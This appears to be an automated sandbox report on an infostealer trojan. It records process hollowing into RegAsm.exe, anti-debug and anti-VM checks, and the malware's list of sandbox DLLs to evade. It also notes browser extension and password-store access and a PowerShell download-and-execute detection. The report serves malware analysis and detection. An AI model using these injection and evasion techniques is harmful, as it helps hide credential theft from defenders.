Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1923AA40	2_2_1923AA40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1923EA80	2_2_1923EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_192319DD	2_2_192319DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19276E80	2_2_19276E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19292EE0	2_2_19292EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1940AEBE	2_2_1940AEBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_192BA0B0	2_2_192BA0B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1923209F	2_2_1923209F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1925A560	2_2_1925A560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_1932A590	2_2_1932A590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_192347AF	2_2_192347AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_192466C0	2_2_192466C0

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00135D10 appears 51 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 19233AF3 appears 37 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 19231F5A appears 31 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 194106B1 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 1923415B appears 125 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004024D7 appears 312 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 19231C2B appears 47 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 1923395E appears 78 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: String function: 004180A8 appears 104 times

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 0.2.file.exe.130000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
Source: 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@4/9@2/3

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_004102C3 _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

2_2_004102C3

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_004106C4 _EH_prolog,CoCreateInstance,SysAllocString,_wtoi64,SysFreeString,SysFreeString,

2_2_004106C4

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199686524322[1].htm

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6728:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegAsm.exe, 00000002.00000002.2901515013.00000000134DC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmp, sqlx[1].dll.2.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: RegAsm.exe, 00000002.00000002.2901515013.00000000134DC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmp, sqlx[1].dll.2.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: RegAsm.exe, RegAsm.exe, 00000002.00000002.2901515013.00000000134DC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmp, sqlx[1].dll.2.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: RegAsm.exe, 00000002.00000002.2901515013.00000000134DC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmp, sqlx[1].dll.2.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: RegAsm.exe, RegAsm.exe, 00000002.00000002.2901515013.00000000134DC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmp, sqlx[1].dll.2.dr	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: RegAsm.exe, 00000002.00000002.2901515013.00000000134DC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmp, sqlx[1].dll.2.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: RegAsm.exe, 00000002.00000002.2901515013.00000000134DC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmp, sqlx[1].dll.2.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: RegAsm.exe, 00000002.00000002.2901515013.00000000134DC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmp, sqlx[1].dll.2.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: RegAsm.exe, 00000002.00000002.2901515013.00000000134DC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmp, sqlx[1].dll.2.dr	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: KFBAEC.2.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: RegAsm.exe, RegAsm.exe, 00000002.00000002.2901515013.00000000134DC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmp, sqlx[1].dll.2.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: RegAsm.exe, 00000002.00000002.2901515013.00000000134DC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2905201001.0000000019448000.00000002.00001000.00020000.00000000.sdmp, sqlx[1].dll.2.dr	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_00417645 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

2_2_00417645

Source: sqlx[1].dll.2.dr

Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00135285 push ecx; ret	0_2_00135298
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004191D5 push ecx; ret	2_2_004191E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19231BF9 push ecx; ret	2_2_193D4C03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_192310C8 push ecx; ret	2_2_19433552

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlx[1].dll

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

2_2_00417645

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: RegAsm.exe PID: 3264, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: RegAsm.exe	Binary or memory string: DIR_WATCH.DLL
Source: RegAsm.exe	Binary or memory string: SBIEDLL.DLL
Source: RegAsm.exe	Binary or memory string: API_LOG.DLL
Source: RegAsm.exe, 00000002.00000002.2899893197.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: AHAL9THJOHNDOEAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlx[1].dll

Jump to dropped file

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0040FCE5 GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 0040FDF8h

2_2_0040FCE5

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00145066 FindFirstFileExW,	0_2_00145066
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040C679 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	2_2_0040C679
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00401162 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	2_2_00401162
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004162AF _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	2_2_004162AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004153F6 _EH_prolog,wsprintfA,FindFirstFileA,memset,memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcat,strtok_s,memset,lstrcat,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,FindNextFileA,FindClose,	2_2_004153F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040B463 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	2_2_0040B463
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_004094E5 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	2_2_004094E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00409900 _EH_prolog,StrCmpCA,FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	2_2_00409900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0040A981 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,	2_2_0040A981
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00415AC2 _EH_prolog,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,	2_2_00415AC2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00415E66 _EH_prolog,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlenA,lstrlenA,	2_2_00415E66
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_00409F72 _EH_prolog,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,	2_2_00409F72

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_00415843 _EH_prolog,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpy,lstrcpy,lstrcpy,lstrlenA,

2_2_00415843

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0040FE81 GetSystemInfo,wsprintfA,

2_2_0040FE81

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: RegAsm.exe, 00000002.00000002.2900507814.0000000001293000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8
Source: RegAsm.exe, 00000002.00000002.2900507814.000000000121A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2900507814.0000000001293000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: RegAsm.exe, 00000002.00000002.2901123982.00000000037A5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

API call chain: ExitProcess graph end node

graph_2-80843

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00139833 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00139833

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

2_2_00417645

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001408D5 mov eax, dword ptr fs:[00000030h]	0_2_001408D5
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00140919 mov eax, dword ptr fs:[00000030h]	0_2_00140919
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0013D920 mov ecx, dword ptr fs:[00000030h]	0_2_0013D920

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00148830 GetProcessHeap,

0_2_00148830

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00139833 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00139833
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00135AE9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00135AE9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00135C45 SetUnhandledExceptionFilter,	0_2_00135C45
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_001357DF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_001357DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041937F memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_0041937F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041E438 SetUnhandledExceptionFilter,	2_2_0041E438
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_0041A8A7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_0041A8A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_19232C8E IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_19232C8E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 2_2_192342AF SetUnhandledExceptionFilter,	2_2_192342AF

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: file.exe PID: 6708, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3264, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\file.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_009B018D CreateProcessA,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,

0_2_009B018D

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\file.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Jump to behavior

